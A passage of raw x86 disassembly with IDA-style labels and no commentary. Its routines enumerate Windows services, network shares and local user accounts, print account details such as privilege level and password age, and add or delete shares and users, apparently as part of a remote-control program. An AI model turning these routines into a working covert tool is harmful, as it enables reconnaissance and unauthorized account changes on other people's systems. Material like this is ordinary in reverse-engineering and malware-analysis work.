loc_40D9EB: ; CODE XREF: sub_40D9B3+120�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_18C]
push 168h
push eax
push 3
push 30h
push [ebp+var_C]
call ds:dword_43AD58 ;; EnumServicesStatusA
test eax, eax
jnz short loc_40DA25
call ds:dword_42408C ;; RtlGetLastWin32Error
cmp eax, 0EAh
jnz loc_40DAD9
loc_40DA25: ; CODE XREF: sub_40D9B3+5F�j
xor edi, edi
cmp [ebp+var_4], ebx
jle loc_40DAD0
lea esi, [ebp+var_188]
loc_40DA36: ; CODE XREF: sub_40D9B3+117�j
mov eax, [esi+8]
dec eax
jz short loc_40DA7F
dec eax
jz short loc_40DA78
dec eax
jz short loc_40DA71
dec eax
jz short loc_40DA6A
dec eax
jz short loc_40DA63
dec eax
jz short loc_40DA5C
dec eax
jz short loc_40DA55
push offset aUnknown_1 ; " Unknown"
jmp short loc_40DA84
; ---------------------------------------------------------------------------
loc_40DA55: ; CODE XREF: sub_40D9B3+99�j
push offset aPaused_0 ; " Paused"
jmp short loc_40DA84
; ---------------------------------------------------------------------------
loc_40DA5C: ; CODE XREF: sub_40D9B3+96�j
push offset aPausing ; " Pausing"
jmp short loc_40DA84
; ---------------------------------------------------------------------------
loc_40DA63: ; CODE XREF: sub_40D9B3+93�j
push offset aContinuing ; " Continuing"
jmp short loc_40DA84
; ---------------------------------------------------------------------------
loc_40DA6A: ; CODE XREF: sub_40D9B3+90�j
push offset aRunning ; " Running"
jmp short loc_40DA84
; ---------------------------------------------------------------------------
loc_40DA71: ; CODE XREF: sub_40D9B3+8D�j
push offset aStoping ; " Stoping"
jmp short loc_40DA84
; ---------------------------------------------------------------------------
loc_40DA78: ; CODE XREF: sub_40D9B3+8A�j
push offset aStarting ; " Starting"
jmp short loc_40DA84
; ---------------------------------------------------------------------------
loc_40DA7F: ; CODE XREF: sub_40D9B3+87�j
push offset aStopped ; " Stopped"
loc_40DA84: ; CODE XREF: sub_40D9B3+A0�j
; sub_40D9B3+A7�j ...
lea eax, [ebp+var_20]
push eax
call sub_4172B0
pop ecx
lea eax, [ebp+var_20]
pop ecx
push dword ptr [esi]
push dword ptr [esi-4]
push eax
lea eax, [ebp+var_38C]
push offset aSSS ; "%s: %s (%s)"
push eax
call sub_4172B0
push 1
lea eax, [ebp+var_38C]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 28h
inc edi
add esi, 24h
cmp edi, [ebp+var_4]
jl loc_40DA36
loc_40DAD0: ; CODE XREF: sub_40D9B3+77�j
cmp [ebp+var_8], ebx
jnz loc_40D9EB
loc_40DAD9: ; CODE XREF: sub_40D9B3+6C�j
push [ebp+var_C]
call ds:dword_43AC9C ;; CloseServiceHandle
xor eax, eax
pop edi
cmp eax, [ebp+var_4]
pop esi
pop ebx
sbb eax, eax
neg eax
leave
retn
sub_40D9B3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DAF0 proc near ; CODE XREF: sub_40EE72:loc_410FB4�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
test edi, edi
jz loc_40DB8A
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, 0
jz short loc_40DB19
dec eax
jnz short loc_40DB6A
push edi
push 0
call sub_40DCC3
pop ecx
pop ecx
jmp short loc_40DB66
; ---------------------------------------------------------------------------
loc_40DB19: ; CODE XREF: sub_40DAF0+18�j
cmp [ebp+arg_8], 0
jnz short loc_40DB58
push 24h
push edi
call sub_418F50
pop ecx
test eax, eax
pop ecx
jnz short loc_40DB58
push 57h
pop eax
loc_40DB30: ; CODE XREF: sub_40DAF0+78�j
push eax
call sub_40E4B7
pop ecx
push eax
lea eax, [esi+esi*2]
push edi
mov esi, offset dword_43F464
push ds:off_42E7A0[eax*4]
push offset dword_42EE98
push esi
call sub_4172B0
add esp, 14h
jmp short loc_40DBAA
; ---------------------------------------------------------------------------
loc_40DB58: ; CODE XREF: sub_40DAF0+2D�j
; sub_40DAF0+3B�j
push [ebp+arg_8]
push edi
push 0
call sub_40DC17
add esp, 0Ch
loc_40DB66: ; CODE XREF: sub_40DAF0+27�j
test eax, eax
jnz short loc_40DB30
loc_40DB6A: ; CODE XREF: sub_40DAF0+1B�j
lea eax, [esi+esi*2]
push edi
mov esi, offset dword_43F464
push ds:off_42E7A4[eax*4]
push offset dword_42EE6C
push esi
call sub_4172B0
add esp, 10h
jmp short loc_40DBAA
; ---------------------------------------------------------------------------
loc_40DB8A: ; CODE XREF: sub_40DAF0+A�j
mov eax, [ebp+arg_0]
mov esi, offset dword_43F464
lea eax, [eax+eax*2]
push ds:off_42E7A0[eax*4]
push offset dword_42EE38
push esi
call sub_4172B0
add esp, 0Ch
loc_40DBAA: ; CODE XREF: sub_40DAF0+66�j
; sub_40DAF0+98�j
mov eax, esi
pop edi
pop esi
pop ebp
retn
sub_40DAF0 endp
; =============== S U B R O U T I N E =======================================
sub_40DBB0 proc near ; CODE XREF: sub_415F88+245�p
arg_0 = dword ptr 4
arg_C = dword ptr 10h
push esi
xor esi, esi
cmp [esp+4+arg_0], esi
jnz short loc_40DBBD
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40DBBD: ; CODE XREF: sub_40DBB0+7�j
push ebx
push ebp
push edi
push esi
push esi
push esi
mov edi, ds:dword_424150
push esi
push 0FFFFFFFFh
mov ebx, 400h
push [esp+24h+arg_0]
push ebx
push esi
call edi ; WideCharToMultiByte
test ds:byte_43F664, 1
mov ebp, eax
jnz short loc_40DBFA
or ds:byte_43F664, 1
lea eax, [ebp+1]
push eax
call sub_4185F5
pop ecx
mov ds:dword_43F404, eax
loc_40DBFA: ; CODE XREF: sub_40DBB0+32�j
push esi
push esi
push ebp
push ds:dword_43F404
push 0FFFFFFFFh
push [esp+18h+arg_C]
push ebx
push esi
call edi ; WideCharToMultiByte
mov eax, ds:dword_43F404
pop edi
pop ebp
pop ebx
pop esi
retn
sub_40DBB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DC17 proc near ; CODE XREF: sub_40DAF0+6E�p
; sub_4162AC+18A�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push edi
push [ebp+arg_0]
call sub_40DC82
push [ebp+arg_4]
mov edi, eax
call sub_40DC82
push 24h
mov [ebp+var_20], eax
push [ebp+arg_4]
call sub_418F50
push [ebp+arg_8]
mov [ebp+var_14], 7Fh
neg eax
sbb eax, eax
and [ebp+var_18], 0
or [ebp+var_10], 0FFFFFFFFh
and [ebp+var_C], 0
and eax, 80000000h
mov [ebp+var_1C], eax
call sub_40DC82
add esp, 14h
mov [ebp+var_8], eax
and [ebp+var_4], 0
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_20]
push eax
push 2
push edi
call ds:dword_43AC98
pop edi
leave
retn
sub_40DC17 endp
; =============== S U B R O U T I N E =======================================
sub_40DC82 proc near ; CODE XREF: sub_40DC17+A�p
; sub_40DC17+14�p ...
arg_0 = dword ptr 4
push ebp
mov ebp, [esp+4+arg_0]
xor eax, eax
cmp ebp, eax
jnz short loc_40DC8F
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40DC8F: ; CODE XREF: sub_40DC82+9�j
push ebx
push esi
mov esi, ds:dword_424070
push edi
push eax
push eax
push 0FFFFFFFFh
push ebp
push 1
push eax
call esi ; MultiByteToWideChar
mov edi, eax
lea eax, [edi+edi+2]
push eax
call sub_4185F5
pop ecx
mov ebx, eax
push edi
push ebx
push 0FFFFFFFFh
push ebp
push 1
push 0
call esi ; MultiByteToWideChar
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn
sub_40DC82 endp
; =============== S U B R O U T I N E =======================================
sub_40DCC3 proc near ; CODE XREF: sub_40DAF0+20�p
; sub_415F88+1BB�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_40DC82
push [esp+8+arg_4]
mov esi, eax
call sub_40DC82
pop ecx
pop ecx
push 0
push eax
push esi
call ds:dword_43AC70
pop esi
retn
sub_40DCC3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DCE6 proc near ; CODE XREF: sub_40EE72+2169�p
var_210 = byte ptr -210h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push ebx
push esi
push edi
push [ebp+arg_C]
call sub_40DC82
xor esi, esi
mov [ebp+var_C], eax
push esi
mov [ebp+arg_C], esi
push [ebp+arg_8]
mov [ebp+var_8], esi
mov [ebp+var_10], esi
push offset aShareNameResou ; "Share name: Resource: "...
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 18h
loc_40DD1F: ; CODE XREF: sub_40DCE6+10F�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_4]
push 0FFFFFFFFh
push eax
push 1F6h
push [ebp+var_C]
call ds:dword_43ACE4
mov ebx, eax
cmp ebx, esi
jz short loc_40DD82
cmp ebx, 0EAh
jz short loc_40DD82
push ebx
push ebx
call sub_40E4B7
pop ecx
push eax
lea eax, [ebp+var_210]
push offset dword_42EEF4
push eax
call sub_4172B0
push esi
lea eax, [ebp+var_210]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 24h
jmp short loc_40DDEF
; ---------------------------------------------------------------------------
loc_40DD82: ; CODE XREF: sub_40DCE6+5D�j
; sub_40DCE6+65�j
push 1
pop edi
cmp [ebp+arg_C], edi
jb short loc_40DDE6
mov eax, [ebp+var_4]
lea esi, [eax+14h]
loc_40DD90: ; CODE XREF: sub_40DCE6+FC�j
push dword ptr [esi+10h]
call ds:dword_43AC8C ;; IsValidSecurityDescriptor
test eax, eax
mov eax, offset aYes ; "Yes"
jnz short loc_40DDA7
mov eax, offset aNo ; "No"
loc_40DDA7: ; CODE XREF: sub_40DCE6+BA�j
push eax
lea eax, [ebp+var_210]
push dword ptr [esi]
push dword ptr [esi+4]
push dword ptr [esi-14h]
push offset a14s24s6u4s ; "%-14S %-24S %-6u %-4s"
push eax
call sub_4172B0
push 1
lea eax, [ebp+var_210]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 2Ch
add esi, 28h
inc edi
cmp edi, [ebp+arg_C]
jbe short loc_40DD90
xor esi, esi
loc_40DDE6: ; CODE XREF: sub_40DCE6+A2�j
push [ebp+var_4]
call ds:dword_43AE28
loc_40DDEF: ; CODE XREF: sub_40DCE6+9A�j
cmp ebx, 0EAh
jz loc_40DD1F
xor eax, eax
cmp ebx, esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_40DCE6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DE07 proc near ; CODE XREF: sub_40EE72:loc_411047�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
cmp ebx, edi
jz loc_40DEAC
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, edi
jz short loc_40DE49
dec eax
jz short loc_40DE3E
dec eax
jnz short loc_40DE64
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push ebx
push edi
call sub_40DF4E
add esp, 14h
jmp short loc_40DE60
; ---------------------------------------------------------------------------
loc_40DE3E: ; CODE XREF: sub_40DE07+1D�j
push ebx
push edi
call sub_40DF2D
pop ecx
pop ecx
jmp short loc_40DE60
; ---------------------------------------------------------------------------
loc_40DE49: ; CODE XREF: sub_40DE07+1A�j
cmp [ebp+arg_8], edi
jz short loc_40DE5D
push [ebp+arg_8]
push ebx
push edi
call sub_40DED3
add esp, 0Ch
jmp short loc_40DE60
; ---------------------------------------------------------------------------
loc_40DE5D: ; CODE XREF: sub_40DE07+45�j
push 57h
pop eax
loc_40DE60: ; CODE XREF: sub_40DE07+35�j
; sub_40DE07+40�j ...
cmp eax, edi
jnz short loc_40DE84
loc_40DE64: ; CODE XREF: sub_40DE07+20�j
lea eax, [esi+esi*2]
push ebx
mov esi, offset dword_43F668
push ds:off_42E7A4[eax*4]
push offset dword_42EFD8
push esi
call sub_4172B0
add esp, 10h
jmp short loc_40DECC
; ---------------------------------------------------------------------------
loc_40DE84: ; CODE XREF: sub_40DE07+5B�j
push eax
call sub_40E4B7
pop ecx
push eax
lea eax, [esi+esi*2]
push ebx
mov esi, offset dword_43F668
push ds:off_42E7A0[eax*4]
push offset dword_42EF9C
push esi
call sub_4172B0
add esp, 14h
jmp short loc_40DECC
; ---------------------------------------------------------------------------
loc_40DEAC: ; CODE XREF: sub_40DE07+D�j
mov eax, [ebp+arg_0]
mov esi, offset dword_43F668
lea eax, [eax+eax*2]
push ds:off_42E7A0[eax*4]
push offset dword_42EF64
push esi
call sub_4172B0
add esp, 0Ch
loc_40DECC: ; CODE XREF: sub_40DE07+7B�j
; sub_40DE07+A3�j
mov eax, esi
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40DE07 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DED3 proc near ; CODE XREF: sub_40DE07+4C�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
and [ebp+var_4], 0
push edi
push [ebp+arg_0]
call sub_40DC82
push [ebp+arg_4]
mov edi, eax
call sub_40DC82
push [ebp+arg_8]
mov [ebp+var_24], eax
call sub_40DC82
add esp, 0Ch
mov [ebp+var_20], eax
and [ebp+var_14], 0
and [ebp+var_10], 0
push 1
and [ebp+var_8], 0
pop eax
lea ecx, [ebp+var_4]
push ecx
lea ecx, [ebp+var_24]
push ecx
push eax
push edi
mov [ebp+var_18], eax
mov [ebp+var_C], 10001h
call ds:dword_43AC7C
pop edi
leave
retn
sub_40DED3 endp
; =============== S U B R O U T I N E =======================================
sub_40DF2D proc near ; CODE XREF: sub_40DE07+39�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_40DC82
push [esp+8+arg_4]
mov esi, eax
call sub_40DC82
pop ecx
pop ecx
push eax
push esi
call ds:dword_43AC6C
pop esi
retn
sub_40DF2D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DF4E proc near ; CODE XREF: sub_40DE07+2D�p
var_204 = byte ptr -204h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 204h
and [ebp+var_4], 0
push esi
push [ebp+arg_0]
call sub_40DC82
push [ebp+arg_4]
mov esi, eax
call sub_40DC82
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push 0Bh
push eax
push esi
call ds:dword_43ADF0
test eax, eax
mov [ebp+arg_0], eax
jnz loc_40E2F6
mov eax, [ebp+var_4]
test eax, eax
jz loc_40E331
push ebx
push edi
push dword ptr [eax]
lea eax, [ebp+var_204]
push offset aAccountS ; "Account: %S"
push eax
call sub_4172B0
mov esi, [ebp+arg_10]
mov edi, [ebp+arg_C]
mov ebx, [ebp+arg_8]
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+0Ch]
lea eax, [ebp+var_204]
push offset aFullNameS ; "Full Name: %S"
push eax
call sub_4172B0
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+8]
lea eax, [ebp+var_204]
push offset aUserCommentS ; "User Comment: %S"
push eax
call sub_4172B0
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+4]
lea eax, [ebp+var_204]
push offset aCommentS ; "Comment: %S"
push eax
call sub_4172B0
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
mov eax, [eax+10h]
sub eax, 0
jz short loc_40E06D
dec eax
jz short loc_40E066
dec eax
jz short loc_40E05F
mov eax, offset aUnknown_0 ; "Unknown"
jmp short loc_40E072
; ---------------------------------------------------------------------------
loc_40E05F: ; CODE XREF: sub_40DF4E+108�j
mov eax, offset aAdministrator ; "Administrator"
jmp short loc_40E072
; ---------------------------------------------------------------------------
loc_40E066: ; CODE XREF: sub_40DF4E+105�j
mov eax, offset aUser_1 ; "User"
jmp short loc_40E072
; ---------------------------------------------------------------------------
loc_40E06D: ; CODE XREF: sub_40DF4E+102�j
mov eax, offset aGuest ; "Guest"
loc_40E072: ; CODE XREF: sub_40DF4E+10F�j
; sub_40DF4E+116�j ...
push eax
lea eax, [ebp+var_204]
push offset aPrivilegeLevel ; "Privilege Level: %s"
push eax
call sub_4172B0
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+14h]
lea eax, [ebp+var_204]
push offset aAuthFlagsD ; "Auth Flags: %d"
push eax
call sub_4172B0
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+1Ch]
lea eax, [ebp+var_204]
push offset aHomeDirectoryS ; "Home Directory: %S"
push eax
call sub_4172B0
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+20h]
lea eax, [ebp+var_204]
push offset aParametersS ; "Parameters: %S"
push eax
call sub_4172B0
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+18h]
lea eax, [ebp+var_204]
push offset aPasswordAgeD ; "Password Age: %d"
push eax
call sub_4172B0
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+2Ch]
lea eax, [ebp+var_204]
push offset aBadPasswordCou ; "Bad Password Count: %d"
push eax
call sub_4172B0
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+30h]
lea eax, [ebp+var_204]
push offset aNumberOfLogins ; "Number of Logins: %d"
push eax
call sub_4172B0
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+24h]
lea eax, [ebp+var_204]
push offset aLastLogonD ; "Last Logon: %d"
push eax
call sub_4172B0
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+28h]
lea eax, [ebp+var_204]
push offset aLastLogoffD ; "Last Logoff: %d"
push eax
call sub_4172B0
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+34h]
lea eax, [ebp+var_204]
push offset aLogonServerS ; "Logon Server: %S"
push eax
call sub_4172B0
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+3Ch]
lea eax, [ebp+var_204]
push offset aWorkstationsS ; "Workstations: %S"
push eax
call sub_4172B0
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+38h]
lea eax, [ebp+var_204]
push offset aCountryCodeD ; "Country Code: %d"
push eax
call sub_4172B0
push 1
push esi
lea eax, [ebp+var_204]
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+4Ch]
lea eax, [ebp+var_204]
push offset aUserSLanguageD ; "User's Language: %d"
push eax
call sub_4172B0
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+40h]
lea eax, [ebp+var_204]
push offset aMax_StorageD ; "Max. Storage: %d"
push eax
call sub_4172B0
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+44h]
lea eax, [ebp+var_204]
push offset aUnitsPerWeekD ; "Units Per Week: %d"
push eax
call sub_4172B0
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40D679
add esp, 20h
pop edi
pop ebx
jmp short loc_40E322
; ---------------------------------------------------------------------------
loc_40E2F6: ; CODE XREF: sub_40DF4E+35�j
push eax
lea eax, [ebp+var_204]
push offset dword_42F008
push eax
call sub_4172B0
push 0
lea eax, [ebp+var_204]
push [ebp+arg_10]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
call sub_40D679
add esp, 20h
loc_40E322: ; CODE XREF: sub_40DF4E+3A6�j
cmp [ebp+var_4], 0
jz short loc_40E331
push [ebp+var_4]
call ds:dword_43AE28
loc_40E331: ; CODE XREF: sub_40DF4E+40�j
; sub_40DF4E+3D8�j
mov eax, [ebp+arg_0]
pop esi
leave
retn
sub_40DF4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E337 proc near ; CODE XREF: sub_40EE72+21F2�p
var_218 = byte ptr -218h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 218h
push ebx
push esi
push edi
xor esi, esi
push [ebp+arg_C]
mov [ebp+var_4], esi
call sub_40DC82
push esi
mov [ebp+var_14], eax
push [ebp+arg_8]
mov [ebp+arg_C], esi
mov [ebp+var_18], esi
mov [ebp+var_10], esi
push offset aUsernameAccoun ; "Username accounts for local system:"
mov [ebp+var_8], esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 18h
loc_40E376: ; CODE XREF: sub_40E337+135�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_4]
push 0FFFFFFFFh
push eax
push 2
push esi
push [ebp+var_14]
call ds:dword_43AD00
cmp eax, esi
mov [ebp+var_C], eax
jz short loc_40E3D7
cmp eax, 0EAh
jz short loc_40E3D7
push eax
push eax
call sub_40E4B7
pop ecx
push eax
lea eax, [ebp+var_218]
push offset dword_42F218
push eax
call sub_4172B0
push esi
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 24h
jmp short loc_40E452
; ---------------------------------------------------------------------------
loc_40E3D7: ; CODE XREF: sub_40E337+62�j
; sub_40E337+69�j
mov edi, [ebp+var_4]
cmp edi, esi
jz loc_40E465
xor ebx, ebx
cmp [ebp+arg_C], esi
jbe short loc_40E452
loc_40E3E9: ; CODE XREF: sub_40E337+ED�j
cmp edi, esi
jz short loc_40E428
push dword ptr [edi]
lea eax, [ebp+var_218]
push offset aS_6 ; " %S"
push eax
call sub_4172B0
push 1
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 20h
add edi, 4
inc [ebp+var_8]
inc ebx
cmp ebx, [ebp+arg_C]
jb short loc_40E3E9
jmp short loc_40E452
; ---------------------------------------------------------------------------
loc_40E428: ; CODE XREF: sub_40E337+B4�j
lea eax, [ebp+var_218]
push offset dword_42F1D4
push eax
call sub_4172B0
push esi
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 1Ch
loc_40E452: ; CODE XREF: sub_40E337+9E�j
; sub_40E337+B0�j ...
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_40E465
push edi
call ds:dword_43AE28
xor edi, edi
mov [ebp+var_4], edi
loc_40E465: ; CODE XREF: sub_40E337+A5�j
; sub_40E337+120�j
cmp [ebp+var_C], 0EAh
jz loc_40E376
cmp edi, esi
jz short loc_40E47D
push edi
call ds:dword_43AE28
loc_40E47D: ; CODE XREF: sub_40E337+13D�j
push [ebp+var_8]
lea eax, [ebp+var_218]
push offset aTotalUsersFoun ; "Total users found: %d."
push eax
call sub_4172B0
push esi
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 20h
xor eax, eax
cmp [ebp+var_C], esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_40E337 endp
; =============== S U B R O U T I N E =======================================
sub_40E4B7 proc near ; CODE XREF: sub_40DAF0+41�p
; sub_40DCE6+69�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, 858h
cmp eax, ecx
ja loc_40E569
jz loc_40E562
cmp eax, 7Bh
ja short loc_40E52E
jz short loc_40E524
cmp eax, 5
jz short loc_40E51A
cmp eax, 8
jz short loc_40E510
cmp eax, 32h
jz short loc_40E506
cmp eax, 35h
jz short loc_40E4FC
cmp eax, 57h
jnz loc_40E5B8
push offset aInvalidParamet ; "Invalid parameter."
jmp loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E4FC: ; CODE XREF: sub_40E4B7+30�j
push offset aServerNameNotF ; "Server name not found."
jmp loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E506: ; CODE XREF: sub_40E4B7+2B�j
push offset aThisNetworkReq ; "This network request is not supported."
jmp loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E510: ; CODE XREF: sub_40E4B7+26�j
push offset aNotEnoughMemor ; "Not enough memory."
jmp loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E51A: ; CODE XREF: sub_40E4B7+21�j
push offset aAccessDenied_ ; "Access denied."
jmp loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E524: ; CODE XREF: sub_40E4B7+1C�j
push offset aTheNameIsInval ; "The name is invalid."
jmp loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E52E: ; CODE XREF: sub_40E4B7+1A�j
sub eax, 7Ch
jz short loc_40E55B
sub eax, 7C8h
jz short loc_40E554
dec eax
jz short loc_40E54A
dec eax
jnz short loc_40E5B8
push offset aDuplicateShare ; "Duplicate share name."
jmp loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E54A: ; CODE XREF: sub_40E4B7+84�j
push offset aInvalidForRedi ; "Invalid for redirected resource."
jmp loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E554: ; CODE XREF: sub_40E4B7+81�j
push offset aDeviceOrDirect ; "Device or directory does not exist."
jmp short loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E55B: ; CODE XREF: sub_40E4B7+7A�j
push offset aLevelParameter ; "Level parameter is invalid."
jmp short loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E562: ; CODE XREF: sub_40E4B7+11�j
push offset aAGeneralFailur ; "A general failure occurred in the netwo"...
jmp short loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E569: ; CODE XREF: sub_40E4B7+B�j
mov ecx, 8C5h
cmp eax, ecx
ja short loc_40E5A2
jz short loc_40E59B
sub eax, 8ADh
jz short loc_40E5CD
dec eax
dec eax
jz short loc_40E594
dec eax
jz short loc_40E58D
dec eax
dec eax
jnz short loc_40E5B8
push offset aTheOperationIs ; "The operation is allowed only on the pr"...
jmp short loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E58D: ; CODE XREF: sub_40E4B7+C9�j
push offset aTheUserAccount ; "The user account already exists."
jmp short loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E594: ; CODE XREF: sub_40E4B7+C6�j
push offset aTheGroupAlread ; "The group already exists."
jmp short loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E59B: ; CODE XREF: sub_40E4B7+BB�j
push offset aThePasswordIsS ; "The password is shorter than required ("...
jmp short loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E5A2: ; CODE XREF: sub_40E4B7+B9�j
sub eax, 8CAh
jz short loc_40E5D4
sub eax, 17h
jz short loc_40E5CD
sub eax, 25h
jz short loc_40E5C6
sub eax, 29h
jz short loc_40E5BF
